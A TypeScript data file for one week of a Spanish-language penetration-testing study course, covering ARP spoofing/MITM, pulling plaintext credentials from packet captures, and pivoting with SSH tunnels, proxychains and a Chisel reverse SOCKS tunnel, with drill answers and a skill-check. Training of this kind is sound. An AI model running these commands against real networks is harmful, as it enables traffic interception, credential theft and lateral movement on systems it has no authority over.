import { StudyWeek } from "@/lib/types";

/** MES 2 / SEMANA 7 (global 7) — Ataques de red: MITM, sniffing, pivoting */
export const month2Week7: StudyWeek = {
  id: "m2-w7",
  monthId: "m2",
  title: "Semana 7 — Ataques de red y Pivoting",
  goal: "Ejecutar ARP spoofing/MITM, capturar tráfico, y moverte entre redes con pivoting/port forwarding.",
  detailed: true,
  blocks: [
    {
      id: "m2-w7-b1",
      weekId: "m2-w7",
      order: 1,
      title: "ARP Spoofing y MITM",
      objective: "Ejecutar un ataque ARP spoofing entre víctima y gateway, y capturar tráfico en texto plano.",
      durationMin: 50,
      type: "practice",
      theoryEs: "ARP spoofing envenena la tabla ARP de la víctima para que crea que TÚ eres el gateway (y viceversa), poniéndote en medio del tráfico (Man-in-the-Middle). No repito teoría de ARP en sí (ya la dominas) — vamos directo a la herramienta.",
      practiceSteps: [
        "Habilita IP forwarding en tu Kali: echo 1 > /proc/sys/net/ipv4/ip_forward",
        "Ejecuta arpspoof entre víctima y gateway: arpspoof -i eth0 -t <IP_víctima> <IP_gateway>",
        "En otra terminal, en la dirección inversa: arpspoof -i eth0 -t <IP_gateway> <IP_víctima>",
        "Captura tráfico con tcpdump: tcpdump -i eth0 -w captura.pcap",
        "Alternativa todo-en-uno: bettercap -iface eth0",
      ],
      subtopics: ["net-mitm"],
      drills: [
        { id: "d1", promptEs: "Escribe el comando arpspoof para hacerte pasar por el gateway 192.168.1.1 ante la víctima 192.168.1.50 (interfaz eth0).", answer: "arpspoof -i eth0 -t 192.168.1.50 192.168.1.1" },
      ],
      glossary: [
        { en: "Man-in-the-Middle (MITM)", es: "hombre en el medio" },
        { en: "ARP spoofing/poisoning", es: "envenenamiento ARP" },
        { en: "IP forwarding", es: "reenvío de IP" },
      ],
      resources: [{ label: "TryHackMe — ARP Poisoning", url: "https://tryhackme.com/room/arppoisoning", platform: "TryHackMe" }],
      closingChecklist: ["Ejecuté un ARP spoofing exitoso en el lab", "Capturé tráfico con tcpdump durante el ataque"],
    },
    {
      id: "m2-w7-b2",
      weekId: "m2-w7",
      order: 2,
      title: "Análisis de tráfico con Wireshark",
      objective: "Abrir una captura .pcap en Wireshark y extraer credenciales en texto plano (HTTP/FTP/Telnet).",
      durationMin: 45,
      type: "practice",
      theoryEs: "En el examen a veces te dan un .pcap y preguntan qué credenciales/datos se filtraron. Wireshark filtra por protocolo y puede 'seguir el stream' de una conexión para ver la conversación completa.",
      practiceSteps: [
        "Abre la captura: wireshark captura.pcap",
        "Filtra solo tráfico HTTP: escribe 'http' en el filtro",
        "Filtra credenciales FTP: escribe 'ftp' y busca comandos USER/PASS",
        "Clic derecho en un paquete -> Follow -> TCP Stream para ver la conversación completa",
        "Alternativa por terminal: tshark -r captura.pcap -Y ftp",
      ],
      subtopics: ["net-mitm"],
      drills: [
        { id: "d1", promptEs: "Escribe el filtro de Wireshark para ver solo tráfico FTP.", answer: "ftp" },
      ],
      glossary: [
        { en: "packet capture (pcap)", es: "captura de paquetes" },
        { en: "follow TCP stream", es: "seguir flujo TCP" },
      ],
      resources: [{ label: "TryHackMe — Wireshark: The Basics", url: "https://tryhackme.com/room/wiresharkthebasicsju6yb", platform: "TryHackMe" }],
      closingChecklist: ["Extraje una credencial en texto plano de un .pcap"],
    },
    {
      id: "m2-w7-b3",
      weekId: "m2-w7",
      order: 3,
      title: "Pivoting y Port Forwarding",
      objective: "Acceder a una red interna no alcanzable directamente usando SSH port forwarding o Chisel desde un host comprometido.",
      durationMin: 50,
      type: "practice",
      theoryEs: "Pivoting = usar una máquina ya comprometida como 'puente' para llegar a una red interna que no puedes alcanzar directo. SSH -L/-R redirige puertos; proxychains te deja correr herramientas (nmap, etc.) como si estuvieras dentro de esa red; Chisel es la alternativa moderna cuando no hay SSH.",
      practiceSteps: [
        "SSH local port forward (acceder a un puerto interno desde tu máquina): ssh -L 8080:<IP_interna>:80 usuario@<host_pivote>",
        "SSH dynamic port forward (SOCKS proxy para proxychains): ssh -D 1080 usuario@<host_pivote>",
        "Configura /etc/proxychains4.conf con socks5 127.0.0.1 1080",
        "Corre una herramienta a través del pivote: proxychains nmap -sT -p445 <IP_interna>",
        "Alternativa sin SSH: en el host pivote, ./chisel client <TU_IP>:8000 R:socks",
      ],
      subtopics: ["net-pivoting"],
      drills: [
        { id: "d1", promptEs: "Escribe el comando SSH para crear un proxy SOCKS dinámico en el puerto 1080 usando el host pivote 'user@10.10.10.5'.", answer: "ssh -D 1080 user@10.10.10.5" },
        { id: "d2", promptEs: "Escribe el comando para escanear el puerto 445 de una IP interna (10.20.0.5) a través de proxychains.", answer: "proxychains nmap -sT -p445 10.20.0.5" },
      ],
      glossary: [
        { en: "pivoting", es: "pivoteo" },
        { en: "port forwarding", es: "redirección de puertos" },
        { en: "SOCKS proxy", es: "proxy SOCKS" },
      ],
      resources: [{ label: "TryHackMe — Pivoting", url: "https://tryhackme.com/room/pivoting", platform: "TryHackMe" }],
      closingChecklist: ["Accedí a un recurso de red interna a través de un pivote", "Usé proxychains con una herramienta de enumeración exitosamente"],
    },
    {
      id: "m2-w7-b4",
      weekId: "m2-w7",
      order: 4,
      title: "Skill-check Semana 7",
      objective: "Aprobar el skill-check de ataques de red y pivoting (70%+).",
      durationMin: 40,
      type: "checkpoint",
      subtopics: ["net-mitm", "net-pivoting"],
      practiceSteps: ["Toma el skill-check en la app (Simulacros > Skill-checks > Semana 7)"],
      closingChecklist: ["Aprobé el skill-check de Semana 7 con 70% o más"],
    },
  ],
};
